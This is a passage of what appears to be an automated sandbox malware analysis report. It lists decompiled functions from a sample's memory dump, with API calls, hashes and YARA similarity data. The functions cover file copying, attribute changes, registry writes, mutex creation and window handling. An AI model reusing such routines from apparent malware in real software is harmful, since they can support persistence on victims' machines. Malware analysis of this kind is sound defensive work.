                                                    0x004017c4
                                                    0x004017bc
                                                    0x004017c8
                                                    0x004017c8
                                                    0x004017d9

                                                    APIs
                                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 004017B5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID: I
                                                    • API String ID: 4275171209-1966777607
                                                    • Opcode ID: a7729a2a40d84c19509578ac64f8ad731e2a19a7efc197d915124daa5f5ca19a
                                                    • Instruction ID: d74b7ebcb609947181d21bffa9b817de474e90391ed7449ce6f0c7caa409c1d9
                                                    • Opcode Fuzzy Hash: a7729a2a40d84c19509578ac64f8ad731e2a19a7efc197d915124daa5f5ca19a
                                                    • Instruction Fuzzy Hash: 16117C76A04705ABC310DF29C880A2BBBE5EBC4764F15C53EE598A73A4E734AC408A49
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004738BC Relevance: 3.0, APIs: 2, Instructions: 38serviceCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 53%
                                                    			E004738BC(char __eax, signed int __ebx) {
				char _v8;
				intOrPtr* _t11;
				void* _t14;
				intOrPtr _t25;
				intOrPtr _t28;

				_push(__ebx);
				_v8 = __eax;
				E00404E70(_v8);
				_push(_t28);
				_push(0x473922);
				_push( *[fs:eax]);
				 *[fs:eax] = _t28;
				_t11 =  *0x49de34; // 0x49b0ec
				if( *_t11 == 2) {
					_t14 = OpenSCManagerA(E00404E80(_v8), 0, 0xf003f); // executed
					if((__ebx & 0xffffff00 | _t14 != 0x00000000) != 0) {
						CloseServiceHandle(_t14);
					}
				}
				_pop(_t25);
				 *[fs:eax] = _t25;
				_push(0x473929);
				return E004049C0( &_v8);
			}








                                                    0x004738c0
                                                    0x004738c1
                                                    0x004738c7
                                                    0x004738ce
                                                    0x004738cf
                                                    0x004738d4
                                                    0x004738d7
                                                    0x004738da
                                                    0x004738e2
                                                    0x004738f8
                                                    0x00473904
                                                    0x00473907
                                                    0x00473907
                                                    0x00473904
                                                    0x0047390e
                                                    0x00473911
                                                    0x00473914
                                                    0x00473921

                                                    APIs
                                                    • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000000,00473922), ref: 004738F8
                                                    • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,000F003F,00000000,00473922), ref: 00473907
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseHandleManagerOpenService
                                                    • String ID:
                                                    • API String ID: 1199824460-0
                                                    • Opcode ID: 2fdb9b70dbb00de11f3476dfc7ba33594891e3983922fd245e65b3b845590b37
                                                    • Instruction ID: 9747779068363641c57f556ad18b80e8a6fd65f6f560b6840aedc400607e3997
                                                    • Opcode Fuzzy Hash: 2fdb9b70dbb00de11f3476dfc7ba33594891e3983922fd245e65b3b845590b37
                                                    • Instruction Fuzzy Hash: A7F0F0F0640308AFD701EB65DD03AAB7BECEB46701BA14477FA04A7292DA789E04E518
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00458384 Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00458384(void* __eax) {
				struct HICON__* _t5;
				void* _t7;
				void* _t8;
				struct HINSTANCE__* _t11;
				CHAR** _t12;
				void* _t13;

				_t13 = __eax;
				 *((intOrPtr*)(_t13 + 0x60)) = LoadCursorA(0, 0x7f00);
				_t8 = 0xffffffea;
				_t12 = 0x49befc;
				do {
					if(_t8 < 0xffffffef || _t8 > 0xfffffff4) {
						if(_t8 != 0xffffffeb) {
							_t11 = 0;
						} else {
							goto L4;
						}
					} else {
						L4:
						_t11 =  *0x49e668; // 0x400000
					}
					_t5 = LoadCursorA(_t11,  *_t12); // executed
					_t7 = E0045843C(_t13, _t5, _t8);
					_t8 = _t8 + 1;
					_t12 =  &(_t12[1]);
				} while (_t8 != 0xffffffff);
				return _t7;
			}









                                                    0x00458388
                                                    0x00458396
                                                    0x00458399
                                                    0x0045839e
                                                    0x004583a3
                                                    0x004583a6
                                                    0x004583b0
                                                    0x004583ba
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x004583b2
                                                    0x004583b2
                                                    0x004583b2
                                                    0x004583b2
                                                    0x004583c0
                                                    0x004583cb
                                                    0x004583d0
                                                    0x004583d1
                                                    0x004583d4
                                                    0x004583dd

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CursorLoad
                                                    • String ID:
                                                    • API String ID: 3238433803-0
                                                    • Opcode ID: bf689adfd6e98978778aa1b4e9e96d131d583808497e92ae72d4c8abb297034b
                                                    • Instruction ID: e70e3c34bb26c70f92347ae4735de209fc646f551b3d90022d55a82ec6438589
                                                    • Opcode Fuzzy Hash: bf689adfd6e98978778aa1b4e9e96d131d583808497e92ae72d4c8abb297034b
                                                    • Instruction Fuzzy Hash: EFF08261B04204579A20563E5CC1A7E7288DBD6B36B60033FFD39E77D2CF2E6C46425A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00409A90 Relevance: 3.0, APIs: 2, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00409A90(void* __eax, long __edx) {
				int _t4;
				long _t7;

				_t7 = 0;
				_t4 = SetFileAttributesA(E00404E80(__eax), __edx); // executed
				if(_t4 == 0) {
					_t7 = GetLastError();
				}
				return _t7;
			}





                                                    0x00409a97
                                                    0x00409aa2
                                                    0x00409aa9
                                                    0x00409ab0
                                                    0x00409ab0
                                                    0x00409ab7

                                                    APIs
                                                    • SetFileAttributesA.KERNEL32(00000000,?,?,?,00000000,00473894,00000000,004738AF), ref: 00409AA2
                                                    • GetLastError.KERNEL32(00000000,?,?,?,00000000,00473894,00000000,004738AF), ref: 00409AAB
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AttributesErrorFileLast
                                                    • String ID:
                                                    • API String ID: 1799206407-0
                                                    • Opcode ID: 0e6a4d1ed7d989c59ffe3b7b72477e84c03d875daab59c38629556e62ceda4c0
                                                    • Instruction ID: a8da59a57bdf58849924320cc2d236a07249c13e055f30f78d96cafe0e5643bb
                                                    • Opcode Fuzzy Hash: 0e6a4d1ed7d989c59ffe3b7b72477e84c03d875daab59c38629556e62ceda4c0
                                                    • Instruction Fuzzy Hash: ABD0C9627051202A961065FF2C8195B818D8ED55A9301427FBA08E3292E568DC0A01BA
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0047423C Relevance: 2.5, APIs: 2, Instructions: 42COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 60%
                                                    			E0047423C(char __eax, void* __ebx, char __edx, void* __esi, void* __eflags) {
				char _v8;
				char _v9;
				void* _t13;
				intOrPtr _t25;
				void* _t27;
				void* _t30;

				_v9 = __edx;
				_v8 = __eax;
				E00404E70(_v8);
				_push(_t30);
				_push(0x4742ac);
				_push( *[fs:eax]);
				 *[fs:eax] = _t30 + 0xfffffff8;
				_t13 = E00406F90(0, 0xffffffff, E00404E80(_v8)); // executed
				_t27 = _t13;
				if(GetLastError() != 0xb7) {
					if(_t27 != 0 && _v9 == 0) {
						CloseHandle(_t27);
					}
				}
				_pop(_t25);
				 *[fs:eax] = _t25;
				_push(0x4742b3);
				return E004049C0( &_v8);
			}









                                                    0x00474244
                                                    0x00474247
                                                    0x0047424d
                                                    0x00474254
                                                    0x00474255
                                                    0x0047425a
                                                    0x0047425d
                                                    0x0047426f
                                                    0x00474274
                                                    0x00474280
                                                    0x00474288
                                                    0x00474291
                                                    0x00474291
                                                    0x00474288
                                                    0x00474298
                                                    0x0047429b
                                                    0x0047429e
                                                    0x004742ab

                                                    APIs
                                                      • Part of subcall function 00406F90: CreateMutexA.KERNEL32(?,?,?,?,?), ref: 00406FA6
                                                    • GetLastError.KERNEL32(00000000,004742AC), ref: 00474276
                                                    • CloseHandle.KERNEL32(00000000,00000000,004742AC), ref: 00474291
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseCreateErrorHandleLastMutex
                                                    • String ID:
                                                    • API String ID: 4294037311-0
                                                    • Opcode ID: 853c572458218ba62eaacf0c9af16c73941a2d40b62ad29ed1ccb0490e373708
                                                    • Instruction ID: 318a60ea147540a6397c20476c41d700bab3d71984a2db83ba3ffa28fcbaf965
                                                    • Opcode Fuzzy Hash: 853c572458218ba62eaacf0c9af16c73941a2d40b62ad29ed1ccb0490e373708
                                                    • Instruction Fuzzy Hash: 3BF0F970908204AEDB11EAE59903AAF77DC9B95364F1242BBF808B22D2DB7C5D10819E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00473804 Relevance: 1.6, APIs: 1, Instructions: 57fileCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 72%
                                                    			E00473804(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr __edx, void* __esi, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				intOrPtr _t51;
				void* _t56;
				void* _t59;
				void* _t61;

				_t61 = __eflags;
				_v20 = 0;
				_v16 = 0;
				_t56 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E00404E70(_v8);
				E00404E70(_v12);
				_push(_t59);
				_push(0x4738af);
				_push( *[fs:eax]);
				 *[fs:eax] = _t59 + 0xfffffff0;
				if(E00409A48(_v12, _t61) != 0) {
					E00404BB8( &_v16, E00404E80(_v12));
					E00409A90(_v16, 0x80);
				}
				_t44 = E00404E80(_v12);
				CopyFileA(E00404E80(_v8), _t25, 0); // executed
				E00404BB8( &_v20, _t44);
				E00409A90(_v20, _t56);
				_pop(_t51);
				 *[fs:eax] = _t51;
				_push(0x4738b6);
				return E004049E4( &_v20, 4);
			}











                                                    0x00473804
                                                    0x0047380e
                                                    0x00473811
                                                    0x00473814
                                                    0x00473816
                                                    0x00473819
                                                    0x0047381f
                                                    0x00473827
                                                    0x0047382e
                                                    0x0047382f
                                                    0x00473834
                                                    0x00473837
                                                    0x00473844
                                                    0x00473853
                                                    0x00473860
                                                    0x00473860
                                                    0x0047386f
                                                    0x0047387b
                                                    0x00473885
                                                    0x0047388f
                                                    0x00473896
                                                    0x00473899
                                                    0x0047389c
                                                    0x004738ae

                                                    APIs
                                                    • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 0047387B
                                                      • Part of subcall function 00409A90: SetFileAttributesA.KERNEL32(00000000,?,?,?,00000000,00473894,00000000,004738AF), ref: 00409AA2
                                                      • Part of subcall function 00409A90: GetLastError.KERNEL32(00000000,?,?,?,00000000,00473894,00000000,004738AF), ref: 00409AAB
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$AttributesCopyErrorLast
                                                    • String ID:
                                                    • API String ID: 2414470624-0
                                                    • Opcode ID: 54442e2231ed2fe87a44932f825a708ca2f892266ddc8fd19e2cb738c30a7185
                                                    • Instruction ID: 249739c2ab59324f255857505799179cd9e45a8e1fd9df759088737bab44b84f
                                                    • Opcode Fuzzy Hash: 54442e2231ed2fe87a44932f825a708ca2f892266ddc8fd19e2cb738c30a7185
                                                    • Instruction Fuzzy Hash: 9C1116B0E001099BDB00EFAAD88299EB7F9FF44714F51457BF514B3391DB389E058A98
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041A81C Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 65%
                                                    			E0041A81C(void* __eax, struct HINSTANCE__* __edx) {
				intOrPtr _v8;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t10;
				intOrPtr _t15;
				struct HINSTANCE__* _t20;
				intOrPtr* _t22;
				intOrPtr _t30;
				void* _t32;
				intOrPtr* _t35;
				intOrPtr _t38;
				intOrPtr _t40;

				_t38 = _t40;
				_push(_t22);
				_t35 = _t22;
				_t20 = __edx;
				_t32 = __eax;
				if(__edx == 0) {
					_t20 =  *0x49e668; // 0x400000
				}
				_t10 = FindResourceA(_t20, E00404E80(_t32), 0xa) & 0xffffff00 | _t9 != 0x00000000;
				_t43 = _t10;
				if(_t10 == 0) {
					return _t10;
				} else {
					_v8 = E0041E0D0(_t20, 1, 0xa, _t32);
					_push(_t38);
					_push(0x41a890);
					_push( *[fs:eax]);
					 *[fs:eax] = _t40;
					_t15 = E0041DA30(_v8, _t20,  *_t35, _t32, _t35, _t43); // executed
					 *_t35 = _t15;
					_pop(_t30);
					 *[fs:eax] = _t30;
					_push(E0041A897);
					return L00403BEC(_v8);
				}
			}


















                                                    0x0041a81d
                                                    0x0041a81f
                                                    0x0041a823
                                                    0x0041a825
                                                    0x0041a827
                                                    0x0041a82b
                                                    0x0041a82d
                                                    0x0041a82d
                                                    0x0041a845
                                                    0x0041a848
                                                    0x0041a84a
                                                    0x0041a89e
                                                    0x0041a84c
                                                    0x0041a85d
                                                    0x0041a862
                                                    0x0041a863
                                                    0x0041a868
                                                    0x0041a86b
                                                    0x0041a873
                                                    0x0041a878
                                                    0x0041a87c
                                                    0x0041a87f
                                                    0x0041a882
                                                    0x0041a88f
                                                    0x0041a88f

                                                    APIs
                                                    • FindResourceA.KERNEL32(?,00000000,0000000A), ref: 0041A83E
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FindResource
                                                    • String ID:
                                                    • API String ID: 1635176832-0
                                                    • Opcode ID: 1f0f77f61c370d43777ca3830916bf5545215fc97a5c03c6e6324103791e270a
                                                    • Instruction ID: 3fa3efa78a76847535e85a5113efc15ba7d11e1912711d246983766bb9fbce65
                                                    • Opcode Fuzzy Hash: 1f0f77f61c370d43777ca3830916bf5545215fc97a5c03c6e6324103791e270a
                                                    • Instruction Fuzzy Hash: 1E014771304300ABE301EF6AEC42EAAB7ADEB88728711407EF504C7381DA79AC028258
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0045A28C Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 64%
                                                    			E0045A28C(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __esi) {
				char _v8;
				void* _t27;
				intOrPtr _t33;
				intOrPtr _t40;
				char _t41;

				_push(0);
				_t37 = __edx;
				_t27 = __eax;
				_push(_t40);
				_push(0x45a30e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t40;
				_t41 =  *((char*)(__eax + 0xa4));
				if(_t41 == 0) {
					_t7 = _t27 + 0x8c; // 0x8c
					E00404A14(_t7, __edx);
				} else {
					E0045A240(__eax,  &_v8);
					E00404DCC(_v8, _t37);
					if(_t41 != 0 ||  *((intOrPtr*)(_t27 + 0x8c)) != 0) {
						SetWindowTextA( *(_t27 + 0x30), E00404E80(_t37));
						_t6 = _t27 + 0x8c; // 0x8c
						E004049C0(_t6);
					}
				}
				_pop(_t33);
				 *[fs:eax] = _t33;
				_push(E0045A315);
				return E004049C0( &_v8);
			}








                                                    0x0045a28f
                                                    0x0045a293
                                                    0x0045a295
                                                    0x0045a299
                                                    0x0045a29a
                                                    0x0045a29f
                                                    0x0045a2a2
                                                    0x0045a2a5
                                                    0x0045a2ac
                                                    0x0045a2eb
                                                    0x0045a2f3
                                                    0x0045a2ae
                                                    0x0045a2b3
                                                    0x0045a2bd
                                                    0x0045a2c2
                                                    0x0045a2d9
                                                    0x0045a2de
                                                    0x0045a2e4
                                                    0x0045a2e4
                                                    0x0045a2c2
                                                    0x0045a2fa
                                                    0x0045a2fd
                                                    0x0045a300
                                                    0x0045a30d

                                                    APIs
                                                      • Part of subcall function 0045A240: GetWindowTextA.USER32 ref: 0045A263
                                                    • SetWindowTextA.USER32(?,00000000), ref: 0045A2D9
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: TextWindow
                                                    • String ID:
                                                    • API String ID: 530164218-0
                                                    • Opcode ID: 41182df715c6d1993ac9e56a2f72632cfa14d16efb69e0a200bee66e53859129
                                                    • Instruction ID: 29e0112d14c0054e859a686d8a752fc0bc116d16f21071392ac3c9ea7363cd22
                                                    • Opcode Fuzzy Hash: 41182df715c6d1993ac9e56a2f72632cfa14d16efb69e0a200bee66e53859129
                                                    • Instruction Fuzzy Hash: E001D4B06006049BD701EB65C842B5A72A8AB88704F5042B7FD0497383D63C9D59866E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00407A8C Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00407A8C(long __eax, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32, long _a36) {
				CHAR* _v8;
				void* _t13;
				struct HWND__* _t24;
				CHAR* _t29;
				long _t32;

				_v8 = _t29;
				_t32 = __eax;
				_t13 = E00402C0C();
				_t24 = CreateWindowExA(_t32, __edx, _v8, _a36, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				E00402BFC(_t13);
				return _t24;
			}








                                                    0x00407a93
                                                    0x00407a98
                                                    0x00407a9a
                                                    0x00407acb
                                                    0x00407ad4
                                                    0x00407ae0

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID:
                                                    • API String ID: 716092398-0
                                                    • Opcode ID: 6f03bbe19ce8bec98a003051f3de9d9a43124493f49fa58d3969b4d3575b5c8e
                                                    • Instruction ID: 8ac853332085b9bd21b4b606e16f655482de0c328e5100a7f3fe009a2cef9f92
                                                    • Opcode Fuzzy Hash: 6f03bbe19ce8bec98a003051f3de9d9a43124493f49fa58d3969b4d3575b5c8e
                                                    • Instruction Fuzzy Hash: EDF092B2704158BF9B80DE9DDD85EDB77ECEB4C264B05416AFA0CE3241D674ED108BA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00407AE4 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00407AE4(CHAR* __eax, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32) {
				long _v8;
				void* _t12;
				struct HWND__* _t22;
				long _t27;
				CHAR* _t30;

				_v8 = _t27;
				_t30 = __eax;
				_t12 = E00402C0C();
				_t22 = CreateWindowExA(0, _t30, __edx, _v8, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				E00402BFC(_t12);
				return _t22;
			}








                                                    0x00407aeb
                                                    0x00407af0
                                                    0x00407af2
                                                    0x00407b21
                                                    0x00407b2a
                                                    0x00407b36

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID:
                                                    • API String ID: 716092398-0
                                                    • Opcode ID: 8d9c814ae894669e17ea23ad296cc65551029b32c6dd679f2156c17a54264ffd
                                                    • Instruction ID: 82a16aa5288589ed1fecfa95a929c264de13a72832aac3a4e9138b950186d13c
                                                    • Opcode Fuzzy Hash: 8d9c814ae894669e17ea23ad296cc65551029b32c6dd679f2156c17a54264ffd
                                                    • Instruction Fuzzy Hash: 76F092B2704158BFDB80DE9EDD85E9B77ECEB4C264B00416ABA0CD7241D574ED108BA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00432310 Relevance: 1.5, APIs: 1, Instructions: 42registryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00432310(void* __eax, char* __ecx, char __edx, void* __eflags, intOrPtr _a4, int _a8) {
				char* _v8;
				char _v12;
				char _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t11;
				long _t17;
				void* _t20;
				void* _t21;
				intOrPtr _t23;
				char _t26;

				_v8 = __ecx;
				_t26 = __edx;
				_t21 = __eax;
				_t11 = L00431D9C(_a4);
				_t27 = _t11;
				_t17 = RegSetValueExA( *(_t21 + 4), E00404E80(__edx), 0, _t11, _v8, _a8); // executed
				if(_t17 != 0) {
					_v16 = _t26;
					_v12 = 0xb;
					_t23 =  *0x49daf4; // 0x417504
					_t20 = E0040D23C(_t21, _t23, 1, _t26, _t27, 0,  &_v16);
					E00404378();
					return _t20;
				}
				return _t17;
			}
















                                                    0x00432319
                                                    0x0043231c
                                                    0x0043231e
                                                    0x00432323
                                                    0x00432328
                                                    0x00432341
                                                    0x00432348
                                                    0x0043234a
                                                    0x0043234d
                                                    0x00432357
                                                    0x00432364
                                                    0x00432369
                                                    0x00000000
                                                    0x00432369
                                                    0x00432374

                                                    APIs
                                                    • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 00432341
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Value
                                                    • String ID:
                                                    • API String ID: 3702945584-0
                                                    • Opcode ID: 19274d5597ff4bf67958b91c708d6c228912aaa851d12f25db2d8365e4f6a269
                                                    • Instruction ID: 39d1438e57032ee4bbe9f28f00567530b1aebd0f65b6a02640603f55bb4cbe43
                                                    • Opcode Fuzzy Hash: 19274d5597ff4bf67958b91c708d6c228912aaa851d12f25db2d8365e4f6a269
                                                    • Instruction Fuzzy Hash: 47F0A471A001087BD700EBAEDC81EAFB7EC9B49314F0040BAFA18E7391DA749D0087A4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004045C4 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • KiUserCallbackDispatcher.NTDLL(00000000,0040460A,?,0049E048,0049B000,0049E638,?,004048AA,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics), ref: 004045FA
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CallbackDispatcherUser
                                                    • String ID:
                                                    • API String ID: 2492992576-0
                                                    • Opcode ID: 2cb3a6cdacff41b7ecbae53b36e203073edb292a1c78f0b9e480f1db04bccd11
                                                    • Instruction ID: f7c3943724ba43c609a58c6de3d79b89b9e31c002ee06463d4949cc27b2d666d
                                                    • Opcode Fuzzy Hash: 2cb3a6cdacff41b7ecbae53b36e203073edb292a1c78f0b9e480f1db04bccd11
                                                    • Instruction Fuzzy Hash: 0BF05B713056056FA3114E47D991913F79CFBD57603558877DA08D3690D639E8118568
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043EAF8 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 53%
                                                    			E0043EAF8(intOrPtr __eax) {
				intOrPtr _v8;
				void* __ecx;
				int _t15;
				intOrPtr _t17;
				void* _t19;
				void* _t20;
				intOrPtr _t23;
				void* _t24;
				void* _t25;
				intOrPtr _t28;

				_push(_t20);
				_v8 = __eax;
				 *(_v8 + 0x54) =  *(_v8 + 0x54) | 0x00000200;
				_push(_t28);
				_push(0x43eb45);
				_push( *[fs:eax]);
				 *[fs:eax] = _t28;
				_t15 = DestroyWindow( *(_v8 + 0x180)); // executed
				if(_t15 == 0) {
					E0040E79C(_t19, _t20, _t24, _t25);
				}
				_pop(_t23);
				 *[fs:eax] = _t23;
				_push(0x43eb4c);
				_t17 = _v8;
				 *(_t17 + 0x54) =  *(_t17 + 0x54) & 0x0000fdff;
				return _t17;
			}













                                                    0x0043eafb
                                                    0x0043eafc
                                                    0x0043eb02
                                                    0x0043eb0a
                                                    0x0043eb0b
                                                    0x0043eb10
                                                    0x0043eb13
                                                    0x0043eb20
                                                    0x0043eb27
                                                    0x0043eb29
                                                    0x0043eb29
                                                    0x0043eb30
                                                    0x0043eb33
                                                    0x0043eb36
                                                    0x0043eb3b
                                                    0x0043eb3e
                                                    0x0043eb44

                                                    APIs
                                                    • DestroyWindow.USER32(?,00000000,0043EB45), ref: 0043EB20
                                                      • Part of subcall function 0040E79C: GetLastError.KERNEL32(00000000,0040E82C), ref: 0040E7B6
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: DestroyErrorLastWindow
                                                    • String ID:
                                                    • API String ID: 1182162058-0
                                                    • Opcode ID: 162f4c810722b2cf9dba1348c30168551af8e42deea3d9e9740feb706b3eb27c
                                                    • Instruction ID: c963e65f66f93bc950c3b922f0db45755e41eff8f234a4ebd21f449329ecdab1
                                                    • Opcode Fuzzy Hash: 162f4c810722b2cf9dba1348c30168551af8e42deea3d9e9740feb706b3eb27c
                                                    • Instruction Fuzzy Hash: 4EF03031615704EFEB16CB6ACA56D59F7E8EB0C710B6204BAF900D7691E638BD10DA18
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00425A84 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00425A84(void* __eax, struct tagSIZE* __ecx, void* __edx, void* __eflags) {
				int _t9;
				int _t13;
				void* _t14;
				intOrPtr _t17;

				_t14 = __eax;
				_t17 =  *0x425ac4; // 0x3
				E00425D3C(__eax, __ecx, _t17);
				 *__ecx = 0;
				__ecx->cy = 0;
				_t9 = E00404C80(__edx);
				_t13 = GetTextExtentPoint32A( *(_t14 + 4), E00404E80(__edx), _t9, __ecx); // executed
				return _t13;
			}







                                                    0x00425a8b
                                                    0x00425a8d
                                                    0x00425a95
                                                    0x00425a9c
                                                    0x00425aa0
                                                    0x00425aa6
                                                    0x00425ab8
                                                    0x00425ac0

                                                    APIs
                                                    • GetTextExtentPoint32A.GDI32(?,00000000,00000000), ref: 00425AB8
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExtentPoint32Text
                                                    • String ID:
                                                    • API String ID: 223599850-0
                                                    • Opcode ID: 09f60f6af201f6e62a1044751ee0e5612e5c10b55f71d40865da04b658c4b6fb
                                                    • Instruction ID: 930b99cdb260b2b8a229d6862ebc98a20fe47073bc0098dbe1fe4fd8dd38ffb9
